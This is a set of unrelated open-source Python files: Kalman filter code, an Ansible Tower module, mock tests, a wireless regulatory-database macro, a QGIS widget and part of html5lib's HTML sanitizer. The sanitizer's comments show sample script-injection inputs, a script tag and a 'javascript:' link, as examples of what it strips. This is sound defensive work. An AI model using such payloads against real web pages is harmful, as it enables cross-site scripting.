inv_err_function_sym[States.ECEF_ORIENTATION_ERR, 0] = sp.Matrix(2 * delta_quat[1:])
inv_err_function_sym[States.ECEF_ORIENTATION_ERR.stop:, 0] = sp.Matrix(-nom_x[States.ECEF_ORIENTATION.stop:, 0] + true_x[States.ECEF_ORIENTATION.stop:, 0])
eskf_params = [[err_function_sym, nom_x, delta_x],
[inv_err_function_sym, nom_x, true_x],
H_mod_sym, f_err_sym, state_err_sym]
#
# Observation functions
#
#imu_rot = euler_rotate(*imu_angles)
h_gyro_sym = sp.Matrix([vroll + roll_bias,
vpitch + pitch_bias,
vyaw + yaw_bias])
pos = sp.Matrix([x, y, z])
gravity = quat_rot.T * ((EARTH_GM / ((x**2 + y**2 + z**2)**(3.0 / 2.0))) * pos)
h_acc_sym = (gravity + acceleration)
h_phone_rot_sym = sp.Matrix([vroll, vpitch, vyaw])
speed = sp.sqrt(vx**2 + vy**2 + vz**2 + 1e-6)
h_speed_sym = sp.Matrix([speed * odo_scale])
h_pos_sym = sp.Matrix([x, y, z])
h_vel_sym = sp.Matrix([vx, vy, vz])
h_orientation_sym = q
h_imu_frame_sym = sp.Matrix(imu_angles)
h_relative_motion = sp.Matrix(quat_rot.T * v)
obs_eqs = [[h_speed_sym, ObservationKind.ODOMETRIC_SPEED, None],
[h_gyro_sym, ObservationKind.PHONE_GYRO, None],
[h_phone_rot_sym, ObservationKind.NO_ROT, None],
[h_acc_sym, ObservationKind.PHONE_ACCEL, None],
[h_pos_sym, ObservationKind.ECEF_POS, None],
[h_vel_sym, ObservationKind.ECEF_VEL, None],
[h_orientation_sym, ObservationKind.ECEF_ORIENTATION_FROM_GPS, None],
[h_relative_motion, ObservationKind.CAMERA_ODO_TRANSLATION, None],
[h_phone_rot_sym, ObservationKind.CAMERA_ODO_ROTATION, None],
[h_imu_frame_sym, ObservationKind.IMU_FRAME, None]]
gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state_err, eskf_params)
def __init__(self, generated_dir):
self.dim_state = self.initial_x.shape[0]
self.dim_state_err = self.initial_P_diag.shape[0]
self.obs_noise = {ObservationKind.ODOMETRIC_SPEED: np.atleast_2d(0.2**2),
ObservationKind.PHONE_GYRO: np.diag([0.025**2, 0.025**2, 0.025**2]),
ObservationKind.PHONE_ACCEL: np.diag([.5**2, .5**2, .5**2]),
ObservationKind.CAMERA_ODO_ROTATION: np.diag([0.05**2, 0.05**2, 0.05**2]),
ObservationKind.IMU_FRAME: np.diag([0.05**2, 0.05**2, 0.05**2]),
ObservationKind.NO_ROT: np.diag([0.00025**2, 0.00025**2, 0.00025**2]),
ObservationKind.ECEF_POS: np.diag([5**2, 5**2, 5**2]),
ObservationKind.ECEF_VEL: np.diag([.5**2, .5**2, .5**2]),
ObservationKind.ECEF_ORIENTATION_FROM_GPS: np.diag([.2**2, .2**2, .2**2, .2**2])}
# init filter
self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, np.diag(self.initial_P_diag), self.dim_state, self.dim_state_err, max_rewind_age=0.2)
@property
def x(self):
return self.filter.state()
@property
def t(self):
return self.filter.filter_time
@property
def P(self):
return self.filter.covs()
def rts_smooth(self, estimates):
return self.filter.rts_smooth(estimates, norm_quats=True)
def init_state(self, state, covs_diag=None, covs=None, filter_time=None):
if covs_diag is not None:
P = np.diag(covs_diag)
elif covs is not None:
P = covs
else:
P = self.filter.covs()
self.filter.init_state(state, P, filter_time)
def predict_and_observe(self, t, kind, meas, R=None):
if len(meas) > 0:
meas = np.atleast_2d(meas)
if kind == ObservationKind.CAMERA_ODO_TRANSLATION:
r = self.predict_and_update_odo_trans(meas, t, kind)
elif kind == ObservationKind.CAMERA_ODO_ROTATION:
r = self.predict_and_update_odo_rot(meas, t, kind)
elif kind == ObservationKind.ODOMETRIC_SPEED:
r = self.predict_and_update_odo_speed(meas, t, kind)
else:
if R is None:
R = self.get_R(kind, len(meas))
elif len(R.shape) == 2:
R = R[None]
r = self.filter.predict_and_update_batch(t, kind, meas, R)
# Normalize quats
quat_norm = np.linalg.norm(self.filter.x[3:7, 0])
self.filter.x[States.ECEF_ORIENTATION, 0] = self.filter.x[States.ECEF_ORIENTATION, 0] / quat_norm
return r
def get_R(self, kind, n):
obs_noise = self.obs_noise[kind]
dim = obs_noise.shape[0]
R = np.zeros((n, dim, dim))
for i in range(n):
R[i, :, :] = obs_noise
return R
def predict_and_update_odo_speed(self, speed, t, kind):
z = np.array(speed)
R = np.zeros((len(speed), 1, 1))
for i, _ in enumerate(z):
R[i, :, :] = np.diag([0.2**2])
return self.filter.predict_and_update_batch(t, kind, z, R)
def predict_and_update_odo_trans(self, trans, t, kind):
z = trans[:, :3]
R = np.zeros((len(trans), 3, 3))
for i, _ in enumerate(z):
R[i, :, :] = np.diag(trans[i, 3:]**2)
return self.filter.predict_and_update_batch(t, kind, z, R)
def predict_and_update_odo_rot(self, rot, t, kind):
z = rot[:, :3]
R = np.zeros((len(rot), 3, 3))
for i, _ in enumerate(z):
R[i, :, :] = np.diag(rot[i, 3:]**2)
return self.filter.predict_and_update_batch(t, kind, z, R)
if __name__ == "__main__":
generated_dir = sys.argv[2]
LiveKalman.generate_code(generated_dir)
| mit |
lmprice/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_inventory.py | 18 | 3741 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_inventory
version_added: "2.3"
author: "Wayne Witzel III (@wwitzel3)"
short_description: create, update, or destroy Ansible Tower inventory.
description:
- Create, update, or destroy Ansible Tower inventories. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- The name to use for the inventory.
required: True
description:
description:
- The description to use for the inventory.
organization:
description:
- Organization the inventory belongs to.
required: True
variables:
description:
- Inventory variables. Use C(@) to get from file.
state:
description:
- Desired state of the resource.
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Add tower inventory
tower_inventory:
name: "Foo Inventory"
description: "Our Foo Cloud Servers"
organization: "Bar Org"
state: present
tower_config_file: "~/tower_cli.cfg"
'''
from ansible.module_utils.ansible_tower import tower_argument_spec, tower_auth_config, tower_check_mode, HAS_TOWER_CLI
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
argument_spec = tower_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
description=dict(),
organization=dict(required=True),
variables=dict(),
state=dict(choices=['present', 'absent'], default='present'),
))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_TOWER_CLI:
module.fail_json(msg='ansible-tower-cli required for this module')
name = module.params.get('name')
description = module.params.get('description')
organization = module.params.get('organization')
variables = module.params.get('variables')
state = module.params.get('state')
json_output = {'inventory': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
inventory = tower_cli.get_resource('inventory')
try:
org_res = tower_cli.get_resource('organization')
org = org_res.get(name=organization)
if state == 'present':
result = inventory.modify(name=name, organization=org['id'], variables=variables,
description=description, create_on_missing=True)
json_output['id'] = result['id']
elif state == 'absent':
result = inventory.delete(name=name, organization=org['id'])
except (exc.NotFound) as excinfo:
module.fail_json(msg='Failed to update inventory, organization not found: {0}'.format(excinfo), changed=False)
except (exc.ConnectionError, exc.BadRequest) as excinfo:
module.fail_json(msg='Failed to update inventory: {0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| gpl-3.0 |
Simplistix/testfixtures | testfixtures/tests/test_mock.py | 1 | 2245 | from testfixtures.mock import Mock, call, ANY
from .test_compare import CompareHelper
class TestCall(CompareHelper):
def test_non_root_call_not_equal(self):
self.check_raises(
call.foo().bar(),
call.baz().bar(),
'\n'
"'call.foo().bar()'\n"
'!=\n'
"'call.baz().bar()'"
)
def test_non_root_attr_not_equal(self):
self.check_raises(
call.foo.bar(),
call.baz.bar(),
'\n'
"'call.foo.bar()'\n"
'!=\n'
"'call.baz.bar()'"
)
def test_non_root_params_not_equal(self):
self.check_raises(
call.foo(x=1).bar(),
call.foo(x=2).bar(),
'\n'
"'call.foo(x=1)'\n"
'!=\n'
"'call.foo(x=2)'"
)
def test_any(self):
assert call == ANY
def test_no_len(self):
assert not call == object()
def test_two_elements(self):
m = Mock()
m(x=1)
assert m.call_args == ((), {'x': 1})
def test_other_empty(self):
assert call == ()
def test_other_single(self):
assert call == ((),)
assert call == ({},)
assert call == ('',)
def test_other_double(self):
assert call == ('', (),)
assert call == ('', {},)
def test_other_quad(self):
assert not call == (1, 2, 3, 4)
class TestMock(CompareHelper):
def test_non_root_call_not_equal(self):
m = Mock()
m.foo().bar()
self.check_raises(
m.mock_calls[-1],
call.baz().bar(),
'\n'
"'call.foo().bar()'\n"
'!=\n'
"'call.baz().bar()'"
)
def test_non_root_attr_not_equal(self):
m = Mock()
m.foo.bar()
self.check_raises(
m.mock_calls[-1],
call.baz.bar(),
'\n'
"'call.foo.bar()'\n"
'!=\n'
"'call.baz.bar()'"
)
def test_non_root_params_not_equal(self):
m = Mock()
m.foo(x=1).bar()
# surprising and annoying (and practically unsolvable :-/):
assert m.mock_calls[-1] == call.foo(y=2).bar()
| mit |
Distrotech/wireless-regdb | web/Regulatory.py | 11 | 4825 | # -*- coding: iso-8859-1 -*-
"""
Regulatory Database
@copyright: 2008 Johannes Berg
@license: ISC, see LICENSE for details.
"""
import codecs, math
from dbparse import DBParser, flag_definitions
Dependencies = ["time"]
def _country(macro, countries, code):
result = []
f = macro.formatter
result.extend([
f.heading(1, 1),
f.text('Regulatory definition for %s' % _get_iso_code(code)),
f.heading(0, 1),
])
try:
country = countries[code]
except:
result.append(f.text('No information available'))
return ''.join(result)
if country.comments:
result.extend([
f.preformatted(1),
f.text('\n'.join(country.comments)),
f.preformatted(0),
])
result.append(f.table(1))
result.extend([
f.table_row(1),
f.table_cell(1), f.strong(1),
f.text('Band [MHz]'),
f.strong(0), f.table_cell(0),
f.table_cell(1), f.strong(1),
f.text('Max BW [MHz]'),
f.strong(0), f.table_cell(0),
f.table_cell(1), f.strong(1),
f.text('Flags'),
f.strong(0), f.table_cell(0),
f.table_cell(1), f.strong(1),
f.text('Max antenna gain [dBi]'),
f.strong(0), f.table_cell(0),
f.table_cell(1), f.strong(1),
f.text('Max EIRP [dBm'),
f.hardspace,
f.text('(mW)]'),
f.strong(0), f.table_cell(0),
f.table_row(0),
])
for perm in country.permissions:
def str_or_na(val, dBm=False):
if val and not dBm:
return '%.2f' % val
elif val:
return '%.2f (%.2f)' % (val, math.pow(10, val/10.0))
return 'N/A'
result.extend([
f.table_row(1),
f.table_cell(1),
f.text('%.3f - %.3f' % (perm.freqband.start, perm.freqband.end)),
f.table_cell(0),
f.table_cell(1),
f.text('%.3f' % (perm.freqband.maxbw,)),
f.table_cell(0),
f.table_cell(1),
f.text(', '.join(perm.textflags)),
f.table_cell(0),
f.table_cell(1),
f.text(str_or_na(perm.power.max_ant_gain)),
f.table_cell(0),
f.table_cell(1),
f.text(str_or_na(perm.power.max_eirp, dBm=True)),
f.table_cell(0),
f.table_row(0),
])
result.append(f.table(0))
result.append(f.linebreak(0))
result.append(f.linebreak(0))
result.append(macro.request.page.link_to(macro.request, 'return to country list'))
return ''.join(result)
_iso_list = {}
def _get_iso_code(code):
if not _iso_list:
for line in codecs.open('/usr/share/iso-codes/iso_3166.tab', encoding='utf-8'):
line = line.strip()
c, name = line.split('\t')
_iso_list[c] = name
return _iso_list.get(code, 'Unknown (%s)' % code)
def macro_Regulatory(macro):
_ = macro.request.getText
request = macro.request
f = macro.formatter
country = request.form.get('alpha2', [None])[0]
dbpath = '/tmp/db.txt'
if hasattr(request.cfg, 'regdb_path'):
dbpath = request.cfg.regdb_path
result = []
if request.form.get('raw', [None])[0]:
result.append(f.code_area(1, 'db-raw', show=1, start=1, step=1))
for line in open(dbpath):
result.extend([
f.code_line(1),
f.text(line.rstrip()),
f.code_line(0),
])
result.append(f.code_area(0, 'db-raw'))
result.append(macro.request.page.link_to(macro.request, 'return to country list'))
return ''.join(result)
warnings = []
countries = DBParser(warn=lambda x: warnings.append(x)).parse(open(dbpath))
if country:
return _country(macro, countries, country)
countries = countries.keys()
countries = [(_get_iso_code(code), code) for code in countries]
countries.sort()
result.extend([
f.heading(1, 1),
f.text('Countries'),
f.heading(0, 1),
])
result.append(f.bullet_list(1))
for name, code in countries:
result.extend([
f.listitem(1),
request.page.link_to(request, name, querystr={'alpha2': code}),
f.listitem(0),
])
result.append(f.bullet_list(0))
if warnings:
result.append(f.heading(1, 2))
result.append(f.text("Warnings"))
result.append(f.heading(0, 2))
result.append(f.preformatted(1))
result.extend(warnings)
result.append(f.preformatted(0))
result.append(request.page.link_to(request, 'view raw database', querystr={'raw': 1}))
return ''.join(result)
| isc |
DelazJ/QGIS | python/plugins/db_manager/db_tree.py | 41 | 6556 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import pyqtSignal, QCoreApplication
from qgis.PyQt.QtWidgets import QWidget, QTreeView, QMenu, QLabel
from qgis.core import Qgis, QgsProject, QgsMessageLog
from qgis.gui import QgsMessageBar, QgsMessageBarItem
from .db_model import DBModel, PluginItem
from .db_plugins.plugin import DBPlugin, Schema, Table
class DBTree(QTreeView):
selectedItemChanged = pyqtSignal(object)
def __init__(self, mainWindow):
QTreeView.__init__(self, mainWindow)
self.mainWindow = mainWindow
self.setModel(DBModel(self))
self.setHeaderHidden(True)
self.setEditTriggers(QTreeView.EditKeyPressed | QTreeView.SelectedClicked)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.setDropIndicatorShown(True)
self.doubleClicked.connect(self.addLayer)
self.selectionModel().currentChanged.connect(self.currentItemChanged)
self.expanded.connect(self.itemChanged)
self.collapsed.connect(self.itemChanged)
self.model().dataChanged.connect(self.modelDataChanged)
self.model().notPopulated.connect(self.collapse)
def refreshItem(self, item=None):
if item is None:
item = self.currentItem()
if item is None:
return
self.model().refreshItem(item)
def showSystemTables(self, show):
pass
def currentItem(self):
indexes = self.selectedIndexes()
if len(indexes) <= 0:
return
return self.model().getItem(indexes[0])
def currentDatabase(self):
item = self.currentItem()
if item is None:
return
if isinstance(item, (DBPlugin, Schema, Table)):
return item.database()
return None
def currentSchema(self):
item = self.currentItem()
if item is None:
return
if isinstance(item, (Schema, Table)):
return item.schema()
return None
def currentTable(self):
item = self.currentItem()
if isinstance(item, Table):
return item
return None
def newConnection(self):
index = self.currentIndex()
if not index.isValid() or not isinstance(index.internalPointer(), PluginItem):
return
item = self.currentItem()
self.mainWindow.invokeCallback(item.addConnectionActionSlot, index)
def itemChanged(self, index):
self.setCurrentIndex(index)
self.selectedItemChanged.emit(self.currentItem())
def modelDataChanged(self, indexFrom, indexTo):
self.itemChanged(indexTo)
def currentItemChanged(self, current, previous):
self.itemChanged(current)
def contextMenuEvent(self, ev):
index = self.indexAt(ev.pos())
if not index.isValid():
return
if index != self.currentIndex():
self.itemChanged(index)
item = self.currentItem()
menu = QMenu(self)
if isinstance(item, (Table, Schema)):
menu.addAction(QCoreApplication.translate("DBTree", "Rename…"), self.rename)
menu.addAction(QCoreApplication.translate("DBTree", "Delete…"), self.delete)
if isinstance(item, Table) and item.canBeAddedToCanvas():
menu.addSeparator()
menu.addAction(self.tr("Add to Canvas"), self.addLayer)
item.addExtraContextMenuEntries(menu)
elif isinstance(item, DBPlugin):
if item.database() is not None:
menu.addAction(self.tr("Re-connect"), self.reconnect)
menu.addAction(self.tr("Remove"), self.delete)
elif not index.parent().isValid() and item.typeName() in ("spatialite", "gpkg"):
menu.addAction(QCoreApplication.translate("DBTree", "New Connection…"), self.newConnection)
if not menu.isEmpty():
menu.exec_(ev.globalPos())
menu.deleteLater()
def rename(self):
item = self.currentItem()
if isinstance(item, (Table, Schema)):
self.edit(self.currentIndex())
def delete(self):
item = self.currentItem()
if isinstance(item, (Table, Schema)):
self.mainWindow.invokeCallback(item.database().deleteActionSlot)
elif isinstance(item, DBPlugin):
self.mainWindow.invokeCallback(item.removeActionSlot)
def addLayer(self):
table = self.currentTable()
if table is not None:
layer = table.toMapLayer()
layers = QgsProject.instance().addMapLayers([layer])
if len(layers) != 1:
QgsMessageLog.logMessage(
self.tr("%1 is an invalid layer - not loaded").replace("%1", layer.publicSource()))
msgLabel = QLabel(self.tr(
"%1 is an invalid layer and cannot be loaded. Please check the <a href=\"#messageLog\">message log</a> for further info.").replace(
"%1", layer.publicSource()), self.mainWindow.infoBar)
msgLabel.setWordWrap(True)
msgLabel.linkActivated.connect(self.mainWindow.iface.mainWindow().findChild(QWidget, "MessageLog").show)
msgLabel.linkActivated.connect(self.mainWindow.iface.mainWindow().raise_)
self.mainWindow.infoBar.pushItem(QgsMessageBarItem(msgLabel, Qgis.Warning))
def reconnect(self):
db = self.currentDatabase()
if db is not None:
self.mainWindow.invokeCallback(db.reconnectActionSlot)
| gpl-2.0 |
drglove/SickRage | lib/html5lib/sanitizer.py | 805 | 16428 | from __future__ import absolute_import, division, unicode_literals
import re
from xml.sax.saxutils import escape, unescape
from .tokenizer import HTMLTokenizer
from .constants import tokenTypes
class HTMLSanitizerMixin(object):
""" sanitization of XHTML+MathML+SVG and of inline style attributes."""
acceptable_elements = ['a', 'abbr', 'acronym', 'address', 'area',
'article', 'aside', 'audio', 'b', 'big', 'blockquote', 'br', 'button',
'canvas', 'caption', 'center', 'cite', 'code', 'col', 'colgroup',
'command', 'datagrid', 'datalist', 'dd', 'del', 'details', 'dfn',
'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'event-source', 'fieldset',
'figcaption', 'figure', 'footer', 'font', 'form', 'header', 'h1',
'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins',
'keygen', 'kbd', 'label', 'legend', 'li', 'm', 'map', 'menu', 'meter',
'multicol', 'nav', 'nextid', 'ol', 'output', 'optgroup', 'option',
'p', 'pre', 'progress', 'q', 's', 'samp', 'section', 'select',
'small', 'sound', 'source', 'spacer', 'span', 'strike', 'strong',
'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'time', 'tfoot',
'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var', 'video']
mathml_elements = ['maction', 'math', 'merror', 'mfrac', 'mi',
'mmultiscripts', 'mn', 'mo', 'mover', 'mpadded', 'mphantom',
'mprescripts', 'mroot', 'mrow', 'mspace', 'msqrt', 'mstyle', 'msub',
'msubsup', 'msup', 'mtable', 'mtd', 'mtext', 'mtr', 'munder',
'munderover', 'none']
svg_elements = ['a', 'animate', 'animateColor', 'animateMotion',
'animateTransform', 'clipPath', 'circle', 'defs', 'desc', 'ellipse',
'font-face', 'font-face-name', 'font-face-src', 'g', 'glyph', 'hkern',
'linearGradient', 'line', 'marker', 'metadata', 'missing-glyph',
'mpath', 'path', 'polygon', 'polyline', 'radialGradient', 'rect',
'set', 'stop', 'svg', 'switch', 'text', 'title', 'tspan', 'use']
acceptable_attributes = ['abbr', 'accept', 'accept-charset', 'accesskey',
'action', 'align', 'alt', 'autocomplete', 'autofocus', 'axis',
'background', 'balance', 'bgcolor', 'bgproperties', 'border',
'bordercolor', 'bordercolordark', 'bordercolorlight', 'bottompadding',
'cellpadding', 'cellspacing', 'ch', 'challenge', 'char', 'charoff',
'choff', 'charset', 'checked', 'cite', 'class', 'clear', 'color',
'cols', 'colspan', 'compact', 'contenteditable', 'controls', 'coords',
'data', 'datafld', 'datapagesize', 'datasrc', 'datetime', 'default',
'delay', 'dir', 'disabled', 'draggable', 'dynsrc', 'enctype', 'end',
'face', 'for', 'form', 'frame', 'galleryimg', 'gutter', 'headers',
'height', 'hidefocus', 'hidden', 'high', 'href', 'hreflang', 'hspace',
'icon', 'id', 'inputmode', 'ismap', 'keytype', 'label', 'leftspacing',
'lang', 'list', 'longdesc', 'loop', 'loopcount', 'loopend',
'loopstart', 'low', 'lowsrc', 'max', 'maxlength', 'media', 'method',
'min', 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'open',
'optimum', 'pattern', 'ping', 'point-size', 'poster', 'pqg', 'preload',
'prompt', 'radiogroup', 'readonly', 'rel', 'repeat-max', 'repeat-min',
'replace', 'required', 'rev', 'rightspacing', 'rows', 'rowspan',
'rules', 'scope', 'selected', 'shape', 'size', 'span', 'src', 'start',
'step', 'style', 'summary', 'suppress', 'tabindex', 'target',
'template', 'title', 'toppadding', 'type', 'unselectable', 'usemap',
'urn', 'valign', 'value', 'variable', 'volume', 'vspace', 'vrml',
'width', 'wrap', 'xml:lang']
mathml_attributes = ['actiontype', 'align', 'columnalign', 'columnalign',
'columnalign', 'columnlines', 'columnspacing', 'columnspan', 'depth',
'display', 'displaystyle', 'equalcolumns', 'equalrows', 'fence',
'fontstyle', 'fontweight', 'frame', 'height', 'linethickness', 'lspace',
'mathbackground', 'mathcolor', 'mathvariant', 'mathvariant', 'maxsize',
'minsize', 'other', 'rowalign', 'rowalign', 'rowalign', 'rowlines',
'rowspacing', 'rowspan', 'rspace', 'scriptlevel', 'selection',
'separator', 'stretchy', 'width', 'width', 'xlink:href', 'xlink:show',
'xlink:type', 'xmlns', 'xmlns:xlink']
svg_attributes = ['accent-height', 'accumulate', 'additive', 'alphabetic',
'arabic-form', 'ascent', 'attributeName', 'attributeType',
'baseProfile', 'bbox', 'begin', 'by', 'calcMode', 'cap-height',
'class', 'clip-path', 'color', 'color-rendering', 'content', 'cx',
'cy', 'd', 'dx', 'dy', 'descent', 'display', 'dur', 'end', 'fill',
'fill-opacity', 'fill-rule', 'font-family', 'font-size',
'font-stretch', 'font-style', 'font-variant', 'font-weight', 'from',
'fx', 'fy', 'g1', 'g2', 'glyph-name', 'gradientUnits', 'hanging',
'height', 'horiz-adv-x', 'horiz-origin-x', 'id', 'ideographic', 'k',
'keyPoints', 'keySplines', 'keyTimes', 'lang', 'marker-end',
'marker-mid', 'marker-start', 'markerHeight', 'markerUnits',
'markerWidth', 'mathematical', 'max', 'min', 'name', 'offset',
'opacity', 'orient', 'origin', 'overline-position',
'overline-thickness', 'panose-1', 'path', 'pathLength', 'points',
'preserveAspectRatio', 'r', 'refX', 'refY', 'repeatCount',
'repeatDur', 'requiredExtensions', 'requiredFeatures', 'restart',
'rotate', 'rx', 'ry', 'slope', 'stemh', 'stemv', 'stop-color',
'stop-opacity', 'strikethrough-position', 'strikethrough-thickness',
'stroke', 'stroke-dasharray', 'stroke-dashoffset', 'stroke-linecap',
'stroke-linejoin', 'stroke-miterlimit', 'stroke-opacity',
'stroke-width', 'systemLanguage', 'target', 'text-anchor', 'to',
'transform', 'type', 'u1', 'u2', 'underline-position',
'underline-thickness', 'unicode', 'unicode-range', 'units-per-em',
'values', 'version', 'viewBox', 'visibility', 'width', 'widths', 'x',
'x-height', 'x1', 'x2', 'xlink:actuate', 'xlink:arcrole',
'xlink:href', 'xlink:role', 'xlink:show', 'xlink:title', 'xlink:type',
'xml:base', 'xml:lang', 'xml:space', 'xmlns', 'xmlns:xlink', 'y',
'y1', 'y2', 'zoomAndPan']
attr_val_is_uri = ['href', 'src', 'cite', 'action', 'longdesc', 'poster',
'xlink:href', 'xml:base']
svg_attr_val_allows_ref = ['clip-path', 'color-profile', 'cursor', 'fill',
'filter', 'marker', 'marker-start', 'marker-mid', 'marker-end',
'mask', 'stroke']
svg_allow_local_href = ['altGlyph', 'animate', 'animateColor',
'animateMotion', 'animateTransform', 'cursor', 'feImage', 'filter',
'linearGradient', 'pattern', 'radialGradient', 'textpath', 'tref',
'set', 'use']
acceptable_css_properties = ['azimuth', 'background-color',
'border-bottom-color', 'border-collapse', 'border-color',
'border-left-color', 'border-right-color', 'border-top-color', 'clear',
'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font',
'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight',
'height', 'letter-spacing', 'line-height', 'overflow', 'pause',
'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness',
'speak', 'speak-header', 'speak-numeral', 'speak-punctuation',
'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent',
'unicode-bidi', 'vertical-align', 'voice-family', 'volume',
'white-space', 'width']
acceptable_css_keywords = ['auto', 'aqua', 'black', 'block', 'blue',
'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed',
'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left',
'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive',
'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top',
'transparent', 'underline', 'white', 'yellow']
acceptable_svg_properties = ['fill', 'fill-opacity', 'fill-rule',
'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin',
'stroke-opacity']
acceptable_protocols = ['ed2k', 'ftp', 'http', 'https', 'irc',
'mailto', 'news', 'gopher', 'nntp', 'telnet', 'webcal',
'xmpp', 'callto', 'feed', 'urn', 'aim', 'rsync', 'tag',
'ssh', 'sftp', 'rtsp', 'afs']
# subclasses may define their own versions of these constants
allowed_elements = acceptable_elements + mathml_elements + svg_elements
allowed_attributes = acceptable_attributes + mathml_attributes + svg_attributes
allowed_css_properties = acceptable_css_properties
allowed_css_keywords = acceptable_css_keywords
allowed_svg_properties = acceptable_svg_properties
allowed_protocols = acceptable_protocols
# Sanitize the +html+, escaping all elements not in ALLOWED_ELEMENTS, and
# stripping out all # attributes not in ALLOWED_ATTRIBUTES. Style
# attributes are parsed, and a restricted set, # specified by
# ALLOWED_CSS_PROPERTIES and ALLOWED_CSS_KEYWORDS, are allowed through.
# attributes in ATTR_VAL_IS_URI are scanned, and only URI schemes specified
# in ALLOWED_PROTOCOLS are allowed.
#
# sanitize_html('<script> do_nasty_stuff() </script>')
# => <script> do_nasty_stuff() </script>
# sanitize_html('<a href="javascript: sucker();">Click here for $100</a>')
# => <a>Click here for $100</a>
def sanitize_token(self, token):
# accommodate filters which use token_type differently
token_type = token["type"]
if token_type in list(tokenTypes.keys()):
token_type = tokenTypes[token_type]
if token_type in (tokenTypes["StartTag"], tokenTypes["EndTag"],
tokenTypes["EmptyTag"]):
if token["name"] in self.allowed_elements:
return self.allowed_token(token, token_type)
else:
return self.disallowed_token(token, token_type)
elif token_type == tokenTypes["Comment"]:
pass
else:
return token
def allowed_token(self, token, token_type):
if "data" in token:
attrs = dict([(name, val) for name, val in
token["data"][::-1]
if name in self.allowed_attributes])
for attr in self.attr_val_is_uri:
if attr not in attrs:
continue
val_unescaped = re.sub("[`\000-\040\177-\240\s]+", '',
unescape(attrs[attr])).lower()
# remove replacement characters from unescaped characters
val_unescaped = val_unescaped.replace("\ufffd", "")
if (re.match("^[a-z0-9][-+.a-z0-9]*:", val_unescaped) and
(val_unescaped.split(':')[0] not in
self.allowed_protocols)):
del attrs[attr]
for attr in self.svg_attr_val_allows_ref:
if attr in attrs:
attrs[attr] = re.sub(r'url\s*\(\s*[^#\s][^)]+?\)',
' ',
unescape(attrs[attr]))
if (token["name"] in self.svg_allow_local_href and
'xlink:href' in attrs and re.search('^\s*[^#\s].*',
attrs['xlink:href'])):
del attrs['xlink:href']
if 'style' in attrs:
attrs['style'] = self.sanitize_css(attrs['style'])
token["data"] = [[name, val] for name, val in list(attrs.items())]
return token
def disallowed_token(self, token, token_type):
if token_type == tokenTypes["EndTag"]:
token["data"] = "</%s>" % token["name"]
elif token["data"]:
attrs = ''.join([' %s="%s"' % (k, escape(v)) for k, v in token["data"]])
token["data"] = "<%s%s>" % (token["name"], attrs)
else:
token["data"] = "<%s>" % token["name"]
if token.get("selfClosing"):
token["data"] = token["data"][:-1] + "/>"
if token["type"] in list(tokenTypes.keys()):
token["type"] = "Characters"
else:
token["type"] = tokenTypes["Characters"]
del token["name"]
return token
def sanitize_css(self, style):
# disallow urls
style = re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style)
# gauntlet
if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
return ''
if not re.match("^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$", style):
return ''
clean = []
for prop, value in re.findall("([-\w]+)\s*:\s*([^:;]*)", style):
if not value:
continue
if prop.lower() in self.allowed_css_properties:
clean.append(prop + ': ' + value + ';')
elif prop.split('-')[0].lower() in ['background', 'border', 'margin',
'padding']:
for keyword in value.split():
if not keyword in self.acceptable_css_keywords and \
not re.match("^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$", keyword):
break
else:
clean.append(prop + ': ' + value + ';')
elif prop.lower() in self.allowed_svg_properties:
clean.append(prop + ': ' + value + ';')
return ' '.join(clean)
class HTMLSanitizer(HTMLTokenizer, HTMLSanitizerMixin):
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=False, lowercaseAttrName=False, parser=None):
